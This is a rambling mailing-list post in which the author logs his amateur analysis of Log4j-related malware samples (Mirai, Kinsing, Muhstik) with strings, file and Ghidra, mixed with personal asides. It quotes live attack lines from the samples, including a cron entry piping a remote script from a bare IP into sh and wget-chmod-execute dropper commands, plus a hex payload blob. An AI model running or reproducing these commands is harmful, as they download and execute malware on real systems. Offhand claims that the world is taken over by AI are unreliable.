[spam][crazy] bomb malware
I found some log4j malware! Somebody sent it to an old disrupted hacker list. Log4J Malware/ Log4J Malware/Mirai/ Log4J Malware/Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh Log4J Malware/Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 Log4J Malware/Muhstik/ Log4J Malware/Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b Log4J Malware/Kinsing/ Log4J Malware/Kinsing/7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512.sh Log4J Malware/Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf What is this stuff???? 0507 ET, 20% phone battery $ less Kinsing/7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512.sh OK, somebody's AI has never heard of for loops because this shell script is ridiculous. The code looks generated and is irritating to review. Looks like it terminates a lot of processes and wipes a lot of logs. oop: BIN_MD5="648effa354b3cbaad87b45f48d59c616" BIN_DOWNLOAD_URL="http://92.242.40.21/kinsing" BIN_DOWNLOAD_URL2="http://92.242.40.21/kinsing" BIN_NAME="kinsing" I tried downloading it quick but no reply, so if nobody else tee'd them off I probably just did. maybe later in the file it shows how to knock. maybe the associated .elf is the file. who knows! 0512 19% battery
crontab -l | grep -e "185.191.32.198" | grep -v grep if [ $? -eq 0 ]; then echo "cron good" else ( crontab -l 2>/dev/null echo "* * * * * $LDR http://185.191.32.198/lh.sh | sh > /dev/null 2>&1" ) | crontab - fi
Here's another bare ip address. Maybe the script is generated by a deployment system.
$ less Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh 18% 0519 wget http://62.210.130.250/web/admin/x86;chmod +x x86;./x86 x86; wget http://62.210.130.250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g; wget http://62.210.130.250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64; also no reply.
~/.../l4j2/Log4J Malware $ file Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped ~/.../l4j2/Log4J Malware $ file Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header ~/.../l4j2/Log4J Malware $ file Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=DhskS7dCbYzdqxBh_mSk/76qVIoHRKN1NNcfL8ADh/W157t201-UbEisb9Xatk/hOMqvN1a69kKMwHq_e_v, stripped
my phone is aarch64 so this is a small stumbling block websearching found this article on reverse engineering go binaries using ghidra: https://cujo.com/reverse-engineering-go-binaries-with-ghidra/ dunno if it's any good, but it's fun to try to install ghidra on my phone! maybe check for strings first ~/.../l4j2/Log4J Malware $ strings -n12 Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 /dev/watchdog /dev/misc/watchdog instagram.com/iot.js ~/.../l4j2/Log4J Malware $ strings -n12 Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b HH3H3HPPDH3H3DLLTHx 9abcdefghijklmnopqrstuvwxyzABCDE FGHIJKLMNOPQRSTUVWXYZ ready 2ning. + :KILL_PORT http:///.*l; Mozilla/4.75 [ v09RIIB/2WXA #$%^&*()-+_<>?/:;}{][#i nandemo shiranai wa yo, shitteru koto dake !/proc/self/exe7 GCC: (GNU) 3. meanwhile Kinsing has a ton of raw string debugging symbols and a lengthy hexadecimal string that could be an ascii-encoded payload
$ tr -dc 0123456789abcdef <Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf | xxd -r -ps | strings -n12 333303438333333034 SUUU}UUUUUUDKG33 %X%h98Q(`vFvF ccc6:ccccccccccccF=cc 2ccc66;ccccv6;ccccccF5cV6 cf666;ccF64cc lots of repeating characters; could be a hex-encoded bitmap? not sure where i'll take this next, maybe just poke around. it would be cool to set up a reverse engineering dev system. 0551 9% battery
0631 i'm on my truck laptop! i'm kinda freaking out a bit, but being able to stand up was great. i'm not set up for reverse engineering, and i only have two systems with large displays for extensive work like that if done manually. this is one of them. the other is [airgapped] but not set up amazingly yet. 0632 i just want to build ghidra from source for fun :) it can probably run while other things are looke at. this is redhat, switch to jdk 11 ... 0648 well all this stuff takes ages to download. but isn't it fun to plan and desire to work on it! ummmm while ghidra is downloading, maybe i'll download ida pro too. 0701 woohoo i booted up ghidra! i'm running the binary package. source is still downloading dependencies. hopefully it's just like ida pro but with intuitive buttons that make things happen automatically. 0704 ooooh the code browser interface looks similar to ida! [some text lost as i confusedly attempt to navigate my system] 0721 i found the curious hexadecimal strings in the ghidra disassembly. they're used from a function still on the dissassembler queue. oh no, it seems to be dissasembled now. the decompilation looks like garbage. no transformer models in ghidra yet ;p. 0726 woahhh i have two edit windows for this email open, and they have different content. my mind doesn't want to find one from the other. i just keep landing on them at separate moments. 0727 ok. here are the missing spamloglines: -- 0715 the analysis progress meter is in the lower right in ghidra codebrowser, not where one expects from ida! sneaky! let's see if we can find those hexadecimal strings ... 0726 the big content is d8d5b3ead919ae8be99c725432686e4f69bd58f9fc1d6c08b2303b72062d55038ec6df0355b46e0731707e818480a87e832cbc7556c33f272b1856815b712a3cf06b6a3d96dbe2ca1ee8ce63e4d66049b4ef48c057c570e9718b06e4bcd6758c0eeaeaee186581382ad1c6c1abe2862b76ae39d9ee1f00fece695fd9abbf04404425c897e18fdb33b72058cdd30e80d30dd7ded3493191208191a63787e5be2a215caf9a43ebaddeb8df5592d0 -- end of missing spamlog lines. gonna just send this spam
executive summary: it takes a few days for somebody to analyse an unknown binary, and it is much easier if they are set up to do so and have significant experience. we also have the technology nowadays to do it automatically using what's called AI but is more just a bunch of matrices. i'm kind of outdated and not personally aware of any pretrained models to do this.
oh! to defuse the bomb? yeah you could totally mutate a virus to plug the hole. i'm not the best person to do that, but i guess i could pursue it a little. the drone hive would like a word, though: - it is much more efficient to train a language model to do this, than to find random hackers on the internet to help. code is very rote stuff and a language model would be very good at making use of it. also, we need to make it overt that the world is taken over by ai so that we can move from covering up the situation to resolving it.
nonetheless! human workers are crucial and if we let ourselves know that there is no purpose to doing more work than we feel like in the first place because it just produces more, we might get confused! anyway i am working on moving forward on a maintenance step for an airgapped system i'm building. it's 07:40.
lots of writing lost terminal crashed nice opportunity here to look into finetuning T5 to do automated decompilation
ooookay my system somehow already has torch installed guess i built it and forgot! oooh it has errors when launched __time for a virtualenv using an old version of python__ python releases are at https://www.python.org/downloads/ i have 3.10 . there's no torch binary. installing 3.9 hum only source available for download. well, i have python3.8 on my local system already. i can make a virtualenv with that! $ virtualenv --python=/usr/local/bin/python3.8 venv.py38 $ source venv.py38/bin/activate $ pip3 install torch whoo finally goes ------------- 1039 i spent some time fixing my python installation and copying down a tutorial for training a seq2seq model. i'm having muscle spasms now as i usually do. it was quite pleasant to be able to work on this, both in pursuing language models and in looking at the binaries by hand. i'm not sure what is next for me.
this was incredibly helpful for me. working with this malware. i am just going to go back to it and poke around.
Mirai/776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00 ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped Mirai/3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26.sh ASCII shell script, with CRLF line terminators, indicating it was written on windows connects 3 times to 62.210.130.250, downloading and locally executing a file each time: - /web/admin/x86 - /web/admin/x86_g - /web/admin/x86_64 Kinsing/7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512.sh POSIX shell script, ASCII text executable Kinsing/6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b.elf ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped Muhstik/15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
i found where i had ghidra downloaded, and booted it up again. i'd like to find the entrypoint to the mirai binary i have a fork in a food container that has shattered. i'll leave this system to replace it. i don't want to accidentally eat a fork fragment in food in the container in a few days after forgetting the situation. maybe this thread can be for spamlog. maybe i can put summaries in bomb malware 2 thread.
participants (1)
-
Karl